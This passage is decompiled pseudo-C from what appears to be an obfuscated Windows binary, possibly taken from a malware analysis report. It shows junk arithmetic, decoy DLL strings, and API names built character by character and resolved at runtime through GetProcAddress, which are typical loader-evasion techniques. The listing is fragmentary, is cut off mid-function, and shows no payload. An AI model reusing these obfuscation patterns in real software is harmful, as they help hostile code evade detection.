				intOrPtr _v1036;
				intOrPtr _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				char _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				char _v1108;
				char _v1112;
				char _v1116;
				char _v1132;
				char _v1148;
				char _v1164;
				char _v1184;
				char _v1204;
				char _v1224;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1368;
				char _v1396;
				char _v1424;
				char _v1452;
				char _v1456;
				char _v1460;
				char _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				char _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				char _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				char _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				char _v1732;
				char _v1736;
				char _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				char _v1816;
				char _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				intOrPtr _v1888;
				intOrPtr _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				char _v1904;
				char _v1908;
				intOrPtr _v1912;
				intOrPtr _v1916;
				intOrPtr _v1920;
				intOrPtr _v1924;
				intOrPtr _v1928;
				intOrPtr _v1932;
				char _v1936;
				char _v1940;
				intOrPtr _v1944;
				intOrPtr _v1948;
				intOrPtr _v1952;
				intOrPtr _v1956;
				intOrPtr _v1960;
				intOrPtr _v1964;
				intOrPtr _v1968;
				intOrPtr _v1972;
				intOrPtr _v1976;
				intOrPtr _v1980;
				intOrPtr _v1984;
				intOrPtr _v1988;
				intOrPtr _v1992;
				intOrPtr _v1996;
				intOrPtr _v2000;
				intOrPtr _v2004;
				intOrPtr _v2008;
				intOrPtr _v2012;
				intOrPtr _v2016;
				intOrPtr _v2020;
				intOrPtr _v2024;
				intOrPtr _v2028;
				intOrPtr _v2032;
				intOrPtr _v2036;
				intOrPtr _v2040;
				intOrPtr _v2044;
				intOrPtr _v2048;
				intOrPtr _v2052;
				intOrPtr _v2056;
				intOrPtr _v2060;
				intOrPtr _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				char _v2076;
				char _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				char _v2096;
				char _v2100;
				char _v2212;
				char _v2528;
				char _v2532;
				char _v2580;
				char _v2612;
				char _v2640;
				char _v2988;
				char _v3016;
				char _v3036;
				char _v3396;
				char _v3456;
				char _v3468;
				char _v3792;
				char _v3828;
				char _v3844;
				char _v4172;
				char _v4176;
				char _v4212;
				char _v4604;
				char _v4624;
				char _v4628;
				char _v4852;
				char _v4856;
				char _v4900;
				char _v4980;
				char _v4984;
				char _v5012;
				char _v5316;
				char _v5320;
				char _v5408;
				intOrPtr _t1874;
				signed int _t1892;
				intOrPtr* _t1898;
				intOrPtr* _t1903;
				intOrPtr* _t1908;
				intOrPtr* _t1913;
				intOrPtr _t1991;
				signed int _t1993;
				intOrPtr _t1994;
				signed int _t2000;
				signed int _t2004;
				signed int _t2009;
				intOrPtr _t2010;
				signed int _t2012;
				signed int _t2014;
				signed int _t2015;
				char* _t2016;
				char* _t2019;
				char* _t2024;
				char* _t2033;
				char* _t2038;
				char* _t2043;
				signed int _t2048;
				signed int _t2155;
				intOrPtr _t2156;
				signed int _t2157;
				signed int _t2158;
				signed int _t2160;
				signed int _t2162;
				signed int _t2163;
				intOrPtr _t2168;
				signed int _t2176;
				signed int _t2179;
				signed int _t2181;
				intOrPtr _t2183;
				signed int _t2190;
				signed int _t2192;
				intOrPtr _t2194;
				signed int _t2197;
				signed int _t2198;
				signed int _t2199;
				intOrPtr _t2201;
				signed int _t2203;
				intOrPtr _t2204;
				intOrPtr _t2205;
				intOrPtr _t2208;
				intOrPtr _t2210;
				intOrPtr _t2213;
				signed int _t2215;
				intOrPtr _t2217;
				intOrPtr _t2219;
				signed int _t2223;
				signed int _t2229;
				signed int _t2237;
				signed int _t2239;
				intOrPtr _t2241;
				signed int _t2242;
				intOrPtr* _t2252;
				intOrPtr* _t2257;
				intOrPtr* _t2262;
				intOrPtr* _t2267;
				intOrPtr* _t2334;
				intOrPtr* _t2339;
				intOrPtr* _t2344;
				intOrPtr* _t2394;
				intOrPtr* _t2399;
				intOrPtr* _t2404;
				signed int _t2451;
				signed int _t2453;
				signed int _t2455;
				signed int _t2456;
				signed int _t2457;
				signed int _t2458;
				signed int _t2460;
				signed int _t2462;
				signed int _t2466;
				signed int _t2467;
				signed int _t2469;
				signed int _t2475;
				intOrPtr* _t2481;
				intOrPtr* _t2486;
				intOrPtr* _t2491;
				signed int _t2539;
				intOrPtr* _t2543;
				intOrPtr* _t2548;
				intOrPtr* _t2553;
				intOrPtr* _t2592;
				intOrPtr* _t2597;
				intOrPtr* _t2632;
				intOrPtr* _t2637;
				intOrPtr* _t2642;
				intOrPtr _t2687;
				intOrPtr* _t2695;
				intOrPtr* _t2700;
				intOrPtr* _t2705;
				signed int _t2745;
				intOrPtr _t2748;
				signed int _t2749;
				signed int _t2751;
				intOrPtr* _t2753;
				intOrPtr* _t2758;
				intOrPtr* _t2763;
				intOrPtr* _t2768;
				signed int _t2814;
				signed int _t2815;
				signed int _t2818;
				signed int _t2819;
				signed int _t2820;
				intOrPtr* _t2825;
				intOrPtr* _t2830;
				intOrPtr* _t2835;
				intOrPtr _t2876;
				intOrPtr* _t2885;
				intOrPtr* _t2890;
				intOrPtr* _t2895;
				intOrPtr* _t2938;
				intOrPtr* _t2943;
				intOrPtr* _t2948;
				intOrPtr* _t2953;
				intOrPtr* _t2958;
				intOrPtr* _t3012;
				intOrPtr* _t3017;
				intOrPtr* _t3022;
				intOrPtr* _t3027;
				intOrPtr* _t3032;
				intOrPtr* _t3037;
				intOrPtr* _t3105;
				intOrPtr* _t3110;
				intOrPtr* _t3115;
				intOrPtr* _t3120;
				intOrPtr* _t3125;
				intOrPtr* _t3130;
				intOrPtr* _t3151;
				intOrPtr* _t3156;
				intOrPtr* _t3161;
				intOrPtr* _t3166;
				intOrPtr* _t3194;
				intOrPtr* _t3199;
				intOrPtr* _t3204;
				intOrPtr* _t3246;
				intOrPtr* _t3251;
				intOrPtr* _t3256;
				intOrPtr* _t3275;
				intOrPtr* _t3280;
				intOrPtr* _t3285;
				signed int _t3318;
				signed int _t3320;
				signed int _t3329;
				signed int _t3331;
				signed int _t3333;
				intOrPtr _t3334;
				signed int _t3335;
				signed int _t3336;
				signed int _t3337;
				intOrPtr _t3338;
				intOrPtr _t3340;
				intOrPtr _t3343;
				signed int _t3345;
				signed int _t3348;
				signed int _t3350;
				intOrPtr _t3352;
				intOrPtr _t3360;
				signed int _t3362;
				signed int _t3364;
				signed int _t3366;
				intOrPtr _t3369;
				signed int _t3371;
				signed int _t3374;
				signed int _t3375;
				signed int _t3377;
				signed int _t3378;
				intOrPtr _t3379;
				signed int _t3392;
				signed int _t3394;
				signed int _t3396;
				intOrPtr _t3398;
				signed int _t3399;
				signed int _t3400;
				signed int _t3404;
				signed int _t3407;
				signed int _t3408;
				char* _t3420;
				char* _t3423;
				char* _t3428;
				char* _t3433;
				char* _t3438;
				char* _t3443;
				char* _t3448;
				char* _t3453;
				char* _t3462;
				char* _t3467;
				char* _t3472;
				char* _t3493;
				char* _t3496;
				char* _t3501;
				char* _t3510;
				char* _t3515;
				char* _t3524;
				char* _t3529;
				char* _t3534;
				char* _t3543;
				char* _t3548;
				char* _t3553;
				char* _t3558;
				char* _t3567;
				char* _t3572;
				char* _t3577;
				char* _t3582;
				char* _t3587;
				char* _t3592;
				char* _t3597;
				char* _t3602;
				char* _t3607;
				char* _t3616;
				intOrPtr _t3660;
				signed int _t3663;
				void* _t3666;
				signed int _t3668;
				signed int _t3670;
				signed int _t3672;
				signed int _t3674;
				intOrPtr _t3675;
				void* _t3677;
				intOrPtr _t3679;
				signed int _t3681;
				signed int _t3683;
				signed int _t3685;
				signed int _t3691;
				signed int _t3693;
				intOrPtr _t3695;
				signed int _t3735;
				signed int _t3737;
				intOrPtr _t3739;
				signed int _t3751;
				char* _t3776;
				char* _t3779;
				char* _t3784;
				char* _t3789;
				char* _t3794;
				char* _t3799;
				char* _t3804;
				char* _t3809;
				char* _t3818;
				char* _t3823;
				char* _t3828;
				char* _t3865;
				char* _t3868;
				char* _t3873;
				char* _t3878;
				char* _t3883;
				char* _t3892;
				char* _t3897;
				char* _t3902;
				void* _t3911;
				intOrPtr _t4323;
				intOrPtr* _t4326;
				intOrPtr* _t4329;
				intOrPtr* _t4333;
				intOrPtr* _t4339;
				intOrPtr* _t4343;
				intOrPtr* _t4347;
				intOrPtr _t4351;
				signed int _t4649;
				intOrPtr _t4842;
				intOrPtr _t4896;
				intOrPtr* _t4908;
				intOrPtr* _t4911;
				intOrPtr* _t4915;
				intOrPtr* _t4919;
				intOrPtr* _t4923;
				intOrPtr* _t4927;
				intOrPtr* _t4931;
				intOrPtr* _t4935;
				intOrPtr* _t4941;
				intOrPtr* _t4945;
				intOrPtr* _t4949;
				intOrPtr* _t4961;
				intOrPtr* _t4964;
				intOrPtr* _t4968;
				intOrPtr* _t4974;
				intOrPtr* _t4978;
				intOrPtr* _t4984;
				intOrPtr* _t4988;
				intOrPtr* _t4992;
				intOrPtr* _t4998;
				intOrPtr* _t5002;
				intOrPtr* _t5006;
				intOrPtr* _t5010;
				intOrPtr* _t5016;
				intOrPtr* _t5020;
				intOrPtr* _t5024;
				intOrPtr* _t5028;
				intOrPtr* _t5032;
				intOrPtr* _t5036;
				intOrPtr* _t5040;
				intOrPtr* _t5044;
				intOrPtr* _t5048;
				intOrPtr* _t5054;
				intOrPtr* _t5097;
				intOrPtr* _t5100;
				intOrPtr* _t5104;
				intOrPtr* _t5108;
				intOrPtr* _t5112;
				intOrPtr* _t5116;
				intOrPtr* _t5120;
				intOrPtr* _t5124;
				intOrPtr* _t5130;
				intOrPtr* _t5134;
				intOrPtr* _t5138;
				intOrPtr* _t5154;
				intOrPtr* _t5157;
				intOrPtr* _t5161;
				intOrPtr* _t5165;
				intOrPtr* _t5169;
				intOrPtr* _t5175;
				intOrPtr* _t5179;
				intOrPtr* _t5183;
				intOrPtr _t5190;
				intOrPtr _t5191;
				void* _t5247;
				void* _t5305;
				void* _t5307;
				char _t5349;
				char _t5355;

				_t5188 = __esi;
				_t5187 = __edi;
				_t3910 = __ebx;
				_t5190 = _t5191;
				_t3911 = 0x2a3;
				goto L1;
				L17:
				_push(_t5190);
				_push(0x86ec50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t5191;
				E0040A0C0( &_v12, _v16);
				_t1892 =  *0x8a9b78; // 0xe152
				 *0x8a9b18 = _t1892;
				E0040A0C0( &_v12, L"mscat32.dll");
				if(_v56 > _v24) {
					_v72 = 0;
					_v424 = _v68 + 0x6c;
					asm("fild dword [ebp-0x1a4]");
					_v24 = E004076E8();
					asm("fild dword [ebp-0x1c]");
					_v28 = E004076F4();
					asm("fild dword [ebp-0x34]");
					_v40 = E004076E8();
					 *0x8a9b18 =  *0x8a9ba4 * 0x33;
					 *0x8a9b78 =  *0x8a9ad8 * 0xc9;
					_t3751 =  *0x8a9a34; // 0x3ea7bd43
					 *0x8a9a44 = _t3751 + 0xfa;
				}
				 *0x8a9b88 = 0;
				E0085E4BC();
				_t1898 =  *0x8a9f14; // 0x8b0922
				_v81 =  *_t1898;
				if(_v81 + 0x9f - 0x1a < 0) {
					_v81 = _v81 - 0x20;
				}
				_t1903 =  *0x8aa080; // 0x8b0916
				_v82 =  *_t1903;
				if(_v82 + 0x9f - 0x1a < 0) {
					_v82 = _v82 - 0x20;
				}
				_t1908 =  *0x8a9ce4; // 0x8b0912
				_v83 =  *_t1908;
				if(_v83 + 0x9f - 0x1a < 0) {
					_v83 = _v83 - 0x20;
				}
				_t1913 =  *0x8a9cf4; // 0x8b0911
				_v84 =  *_t1913;
				if(_v84 + 0x9f - 0x1a < 0) {
					_v84 = _v84 - 0x20;
				}
				E0040A3C0(0);
				_push(_v528);
				E0040A3C0(0);
				_push(_v532);
				E0040A3C0(0);
				_push(_v536);
				E0040A3C0(0);
				_push(_v540);
				E0040A3C0(0);
				_push(_v544);
				E0040A3C0(0);
				_push(_v548);
				E0040A3C0(0);
				_push(_v552);
				E0040A3C0(0);
				_push(_v556);
				E0040A3C0(0);
				_push(_v560);
				E0040A3C0(0);
				_push(_v564);
				E0040A3C0(0);
				_push(_v568);
				E0040A3C0(0);
				E0040A494( &_v524, _t3910, 0xc, _t5187, _t5188);
				E0040A9E8( &_v12, _v524, _v572);
				E0040A950();
				_push(_v584);
				E0040A950();
				_push(_v588);
				E0040A950();
				_push(_v592);
				E0040A950();
				_push(_v596);
				E0040A950();
				_push(_v600);
				E0040A950();
				_push(_v604);
				E00422C7C(3,  &_v608);
				_push(_v608);
				E00422C7C(2,  &_v612);
				_push(_v612);
				_push(0x86f4dc);
				E0040A950();
				_push(_v616);
				E0040A950();
				_push(_v620);
				E0040A950();
				_push(_v624);
				E0040AC04( &_v580, _t3910, 0xc, _t5187, _t5188);
				E0040AA1C( &_v576, _v580);
				_v8 = GetModuleHandleW(E0040A71C(_v576));
				_v72 = 0;
				do {
					E0040A0C0( &_v12, _v20);
					_v72 = _v72 + 1;
				} while (_v72 != 5);
				_v36 = 0;
				E0085E4BC();
				_v68 = 0;
				do {
					E0040A0C0( &_v12, _v12);
					_v68 = _v68 + 1;
				} while (_v68 != 0xc);
				_v60 = 0;
				while(_v60 < 0xd) {
					_v60 = _v60 + 1;
					E0040A0C0( &_v12, _v16);
					_v64 = 0;
					while(_v64 < 0xc) {
						_v64 = _v64 + 1;
						_v76 = _v24 + _v40;
						_v32 = 0x9c - _v56;
						_t3735 =  *0x8a9a9c; // 0xdd124098
						 *0x8a9ae4 = _t3735 *  *0x8a9a68;
						_t3737 =  *0x8a9b24; // 0x3d5d8262
						 *0x8a9b5c = _t3737 + 4;
						_t3739 =  *0x8a9ac4; // 0x3d5d836c
						_v424 = _t3739 + 4;
						asm("fild dword [ebp-0x1a4]");
						 *0x8a9a68 = E004076F4();
						 *0x8a9b14 =  *0x8a9ab4 * 0xc1;
					}
				}
				E0040A0C0( &_v12, _v12);
				 *0x8a9af0 = 0;
				E0085E4BC();
				if(_v8 == 0) {
					E0040A0C0( &_v12, _v12);
					_v72 = 0;
					_t1991 =  *0x8a9b3c; // 0xd52e2db0
					 *0x8a9b3c = E00407278(_t1991);
					_t1993 =  *0x8a9a50; // 0x21bb532
					 *0x8a9b74 = _t1993;
					_t1994 =  *0x8a9b3c; // 0xd52e2db0
					__eflags = _t1994 -  *0x8a9b74; // 0x6c1f3c91
					if(__eflags < 0) {
						_v24 = _v32 + 0xd;
						asm("fild dword [ebp-0x28]");
						_v40 = E004076F4();
						_v424 = _v28 + 0x98;
						asm("fild dword [ebp-0x1a4]");
						_v68 = E004076E8();
						_t2237 =  *0x8a9a50; // 0x21bb532
						 *0x8a9b24 = _t2237 + 0x3a;
						_t2239 =  *0x8a9a3c; // 0xf5bf4efb
						 *0x8a9ba8 = _t2239 +  *0x8a9b90;
						_t2241 =  *0x8a9b00; // 0x23fd000
						_t2242 = _t2241 -  *0x8a99e4;
						__eflags = _t2242;
						 *0x8a9ae0 = _t2242;
					}
					E0040A0C0( &_v12, _v16);
					 *0x8a9b60 =  *0x8a9a50 * 0x89;
					 *0x8a9ae4 = 0;
					E0085E4BC();
					_t2000 =  *0x8a9b84; // 0x3d5d8300
					 *0x8a9b68 = _t2000 + 0x2b;
					 *0x8a9ac8 = 0;
					E0085E4BC();
					_t2004 =  *0x8a9a68; // 0xc1cbcb7
					 *0x8a9b08 = _t2004;
					_pop(_t4323);
					 *[fs:eax] = _t4323;
					_v48 = _v40 * _v36;
					_v64 = 0;
					__eflags = _v64 - 3;
					if(_v64 < 3) {
						_v64 = _v64 + 1;
						__eflags = 0;
						_v68 = 0;
						do {
							_v424 = _v52 + 0x73;
							asm("fild dword [ebp-0x1a4]");
							_v76 = E004076E8();
							_v32 = 0xfa - _v24;
							_t2176 =  *0x8a9b44; // 0xd1f819c4
							 *0x8a9adc = _t2176 + _t2176 * 4 + (_t2176 + _t2176 * 4) * 4;
							_t2179 =  *0x8a9ba8; // 0xb7179160
							 *0x8a9ba0 = _t2179 *  *0x8a9a68;
							_t2181 =  *0x8a9a3c; // 0xf5bf4efb
							 *0x8a9ae8 = _t2181 +  *0x8a9ba8;
							_t2183 =  *0x8a9af4; // 0x4c5f602c
							_v424 = _t2183 + 0xa1;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9a58 = E004076E8();
							_v68 = _v68 + 1;
							__eflags = _v68 - 0xc;
						} while (_v68 != 0xc);
						E0040ACB4(_v20, _v12);
						if(__eflags != 0) {
							 *0x8a9b90 =  *0x8a9b48 * 0xc2;
							 *0x8a9ab8 =  *0x8a9aa4 * 0x57;
							_t2190 =  *0x8a9a50; // 0x21bb532
							 *0x8a9b58 = _t2190 + 0x86;
							_t2192 =  *0x8a9b14; // 0xdd124098
							 *0x8a9a84 = _t2192 - 0x81;
							_t2194 =  *0x8a9af4; // 0x4c5f602c
							_v424 = _t2194 + 0x4a;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b28 = E004076E8();
							_t2197 =  *0x8a9ba4; // 0x9636d1f4
							_t2198 = _t2197 + 4;
							__eflags = _t2198;
							 *0x8a9a3c = _t2198;
						} else {
							_t2219 =  *0x8a9b30; // 0x46db6ea8
							_v424 = _t2219 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9a88 = E004076F4();
							 *0x8a9b28 =  *0x8a9b20 * 0xe4;
							_t2223 =  *0x8a9b84; // 0x3d5d8300
							 *0x8a9b98 = _t2223 +  *0x8a9ae8;
							 *0x8a9af0 = 0xe -  *0x8a9b70;
							 *0x8a9b98 = 0xa3 -  *0x8a9adc;
							_t2229 =  *0x8a9b18; // 0x12e
							 *0x8a9a94 = _t2229 +  *0x8a9a64;
						}
						_t2199 =  *0x8a9b48; // 0xb2
						 *0x8a9a44 = _t2199 -  *0x8a9a54;
						_t2201 =  *0x8a9b3c; // 0xd52e2db0
						 *0x8a9b3c = E00407278(_t2201);
						_t2203 =  *0x8a9b84; // 0x3d5d8300
						 *0x8a9b70 = _t2203;
						_t2204 =  *0x8a9b3c; // 0xd52e2db0
						__eflags = _t2204 -  *0x8a9b70; // 0xfe23f735
						if(__eflags > 0) {
							_t2205 =  *0x8a9a58; // 0x22edbf74
							_v424 = _t2205 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b00 = E004076F4();
							_t2208 =  *0x8a9ad4; // 0xa40b347
							 *0x8a9bc0 = _t2208 + 0xe9;
							_t2210 =  *0x8a9abc; // 0x46db6e96
							_v424 = _t2210 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9ac8 = E004076F4();
							_t2213 =  *0x8a9ae8; // 0x7c
							 *0x8a9b98 = _t2213 - 0x79;
							_t2215 = E008A9A8C; // 0x3ec86c80
							 *0x8a9ab4 = _t2215 + 4;
							_t2217 =  *0x8a9abc; // 0x46db6e96
							 *0x8a9b80 = _t2217 +  *0x8a9ba8;
						}
					}
					_t2009 =  *0x8a9a68; // 0xc1cbcb7
					 *0x8a9aa4 = _t2009;
					_t2010 =  *0x8a9afc; // 0x0
					E0040ACB4(_t2010, L"IMEPADSM.DLL");
					if(__eflags != 0) {
						_t2012 =  *0x8a9b60; // 0xf477f20
						 *0x8a9a58 = _t2012 - 0x42;
						_t2014 =  *0x8a9bb0; // 0x6c9a
						 *0x8a9b40 = _t2014;
						_t2015 =  *0x8a9b40; // 0xa8062ee0
						__eflags = _t2015 -  *0x8a9aa4; // 0xf5bf4f76
						if(__eflags < 0) {
							_t2156 =  *0x8a9a84; // 0xf5bf4ea3
							 *0x8a9ac0 = _t2156;
							_t2157 =  *0x8a9b78; // 0xe152
							 *0x8a9b6c = _t2157;
							_t2158 =  *0x8a9aa0; // 0x874f31f
							 *0x8a9a40 = _t2158 -  *0x8a9b48;
							_t2160 =  *0x8a9b90; // 0xb7179160
							 *0x8a9b4c = _t2160 + 0x79;
							_t2162 =  *0x8a9b44; // 0xd1f819c4
							_t2163 = _t2162 *  *0x8a9ba8;
							__eflags = _t2163;
							 *0x8a9a54 = _t2163;
							asm("fild dword [0x8a9b2c]");
							 *0x8a9b44 = E004076F4();
						}
					} else {
						E0040ACEC(_v12, 0, 1,  &_v12);
						_t2168 =  *0x8a9a70; // 0x9636d1f8
						 *0x8a9a40 = _t2168 + 0xf;
					}
					_t2016 =  &_v412;
					_t4326 =  *0x8aa104; // 0x8b0919
					 *((char*)(_t2016 + 1)) =  *_t4326;
					 *_t2016 = 1;
					E0040A324( &_v416,  &_v412);
					_t2019 =  &_v420;
					_t4329 =  *0x8a9fd0; // 0x8b0917
					 *((char*)(_t2019 + 1)) =  *_t4329;
					 *_t2019 = 1;
					E0040A34C( &_v416, 2,  &_v420);
					E0040A324( &_v424,  &_v416);
					_t2024 =  &_v420;
					_t4333 =  *0x8aa15c; // 0x8b091c
					 *((char*)(_t2024 + 1)) =  *_t4333;
					 *_t2024 = 1;
					E0040A34C( &_v424, 3,  &_v420);
					E0040A324( &_v432,  &_v424);
					E0040A34C( &_v432, 4, 0x86f3d4);
					E0040A324( &_v440,  &_v432);
					_t2033 =  &_v420;
					_t4339 =  *0x8aa15c; // 0x8b091c
					 *((char*)(_t2033 + 1)) =  *_t4339;
					 *_t2033 = 1;
					E0040A34C( &_v440, 5,  &_v420);
					E0040A324( &_v448,  &_v440);
					_t2038 =  &_v420;
					_t4343 =  *0x8a9f14; // 0x8b0922
					 *((char*)(_t2038 + 1)) =  *_t4343;
					 *_t2038 = 1;
					E0040A34C( &_v448, 6,  &_v420);
					E0040A324( &_v456,  &_v448);
					_t2043 =  &_v420;
					_t4347 =  *0x8a9f14; // 0x8b0922
					 *((char*)(_t2043 + 1)) =  *_t4347;
					 *_t2043 = 1;
					E0040A34C( &_v456, 7,  &_v420);
					E0040AA98( &_v456);
					_t2048 =  *0x8a9b38; // 0xfde44b1c
					__eflags = _t2048 + 0xf1 -  *0x8a9abc; // 0x46db6e96
					if(__eflags < 0) {
						_t2155 = E008A9A8C * 0xd0;
						__eflags = _t2155;
						 *0x8a9a3c = _t2155;
					}
					__eflags = 0;
					_pop(_t4351);
					 *[fs:eax] = _t4351;
					_push(E0086F3CD);
					E00409D28( &_v5408, 0x16);
					E00409C98( &_v5320);
					E00409D28( &_v5316, 0x4c);
					E00409CBC( &_v4984);
					E00409D28( &_v5012, 7);
					E00409D28( &_v4980, 0x14);
					E00409CF8( &_v4900, 0xb);
					E00409CE0( &_v4856);
					E00409D28( &_v4852, 0x38);
					E00409D28( &_v4624, 5);
					E00409CBC( &_v4628);
					E00409D28( &_v4604, 0x62);
					E00409CE0( &_v4176);
					E00409CF8( &_v4212, 9);
					E00409D28( &_v4172, 0x52);
					E00409D28( &_v3828, 9);
					E00409D28( &_v3844, 4);
					E00409D28( &_v3792, 0x51);
					E00409D28( &_v3456, 0xf);
					E00409D28( &_v3468, 3);
					E00409D28( &_v3396, 0x5a);
					E00409D28( &_v3016, 7);
					E00409D28( &_v3036, 5);
					E00409D28( &_v2988, 0x57);
					E00409D28( &_v2612, 8);
					E00409D28( &_v2640, 7);
					E00409CF8( &_v2580, 0xc);
					E00409CE0( &_v2532);
					E00409D28( &_v2528, 0x4f);
					E00409CBC( &_v2100);
					E00409D28( &_v2212, 0x1c);
					E00409D28( &_v2096, 0x46);
					E00409D28( &_v1740, 2);
					E00409D28( &_v1816, 0x13);
					E00409D28( &_v1732, 0x46);
					E00409D28( &_v1116, 2);
					E00409D28( &_v1080, 9);
					E00409D28( &_v1108, 7);
					E00409D28( &_v1044, 0x54);
					E00409D28( &_v660, 9);
					E00409D28( &_v708, 0xc);
					E00409CF8( &_v624, 0xc);
					E00409CE0( &_v576);
					E00409D28( &_v572, 0xd);
					E00409CBC( &_v376);
					E00409CBC( &_v368);
					E00409CBC( &_v344);
					E00409CBC( &_v328);
					E00409CBC( &_v204);
					E00409CBC( &_v168);
					E00409CBC( &_v148);
					return E00409CF8( &_v20, 3);
				} else {
					asm("fild dword [ebp-0x24]");
					_v56 = E004076E8();
					_v44 = _v64 * 0x8a;
					if(_v60 - _v28 == _v60) {
						E0040A0C0( &_v12, L"wow32.dll");
					}
					_v72 = _v24 + _v76;
					_v36 = 0;
					if(_v36 < 0xc) {
						_v36 = _v36 + 1;
						if(_v44 - _v40 == _v60) {
							E0040A0C0( &_v20, _v12);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v16, _v12);
							E0040ACEC(_v20, 2, 1,  &_v16);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v12, _v12);
						}
					}
					E0040A0C0( &_v12, _v20);
					_t2252 =  *0x8a9f40; // 0x8b0925
					_v85 =  *_t2252;
					if(_v85 + 0x9f - 0x1a < 0) {
						_v85 = _v85 - 0x20;
					}
					_t2257 =  *0x8a9ffc; // 0x8b091a
					_v86 =  *_t2257;
					if(_v86 + 0x9f - 0x1a < 0) {
						_v86 = _v86 - 0x20;
					}
					_t2262 =  *0x8a9f40; // 0x8b0925
					_v87 =  *_t2262;
					if(_v87 + 0x9f - 0x1a < 0) {
						_v87 = _v87 - 0x20;
					}
					_t2267 =  *0x8a9ffc; // 0x8b091a
					_v88 =  *_t2267;
					if(_v88 + 0x9f - 0x1a < 0) {
						_v88 = _v88 - 0x20;
					}
					E0040A3C0(0);
					_push(_v632);
					E0040A3C0(0);
					_push(_v636);
					E0040A3C0(0);
					_push(_v640);
					E0040A3C0(0);
					_push(_v644);
					E0040A3C0(0);
					_push(_v648);
					E0040A3C0(0);
					_push(_v652);
					E0040A3C0(0);
					_push(_v656);
					E0040A3C0(0);
					_push(_v660);
					E0040A3C0(0);
					_push(_v664);
					E0040A3C0(0);
					_push(_v668);
					E0040A3C0(0);
					_push(_v672);
					E0040A3C0(0);
					_push(_v676);
					E0040A3C0(0);
					_push(_v680);
					E0040A3C0(0);
					_push(_v684);
					E0040A3C0(0);
					_push(_v688);
					E0040A3C0(0);
					_push(_v692);
					E0040A3C0(0);
					_push(_v696);
					E0040A3C0(0);
					_push(_v700);
					E0040A3C0(0);
					_push(_v704);
					E0040A3C0(0);
					_push(_v708);
					E0040A494( &_v628, _t3910, 0x14, _t5187, _t5188);
					 *0x8b11d8 = GetProcAddress(_v8, E0040A594(_v628));
					E0040A0C0( &_v12, _v20);
					E0040A0C0( &_v12, L"EP0NS411.DLL");
					_v68 = 0;
					do {
						if(_v56 - _v32 > _v68 - _v32) {
							_v64 = _v40;
							asm("fild dword [ebp-0x38]");
							_v72 = E004076F4();
							_v28 = _v76;
							_v424 = _v56 + 0xee;
							asm("fild dword [ebp-0x1a4]");
							_v32 = E004076E8();
							E0040A0C0( &_v16, _v12);
							E0040A0C0( &_v20, _v20);
						}
						E0040A0C0( &_v12, _v12);
						_v68 = _v68 + 1;
					} while (_v68 != 5);
					E0040ACEC(_v12, 0, 1,  &_v12);
					E0040A0C0( &_v12, _v20);
					E0040A0C0( &_v12, _v12);
					_t2334 =  *0x8a9f40; // 0x8b0925
					_v89 =  *_t2334;
					if(_v89 + 0x9f - 0x1a < 0) {
						_v89 = _v89 - 0x20;
					}
					_t2339 =  *0x8a9d58; // 0x8b0913
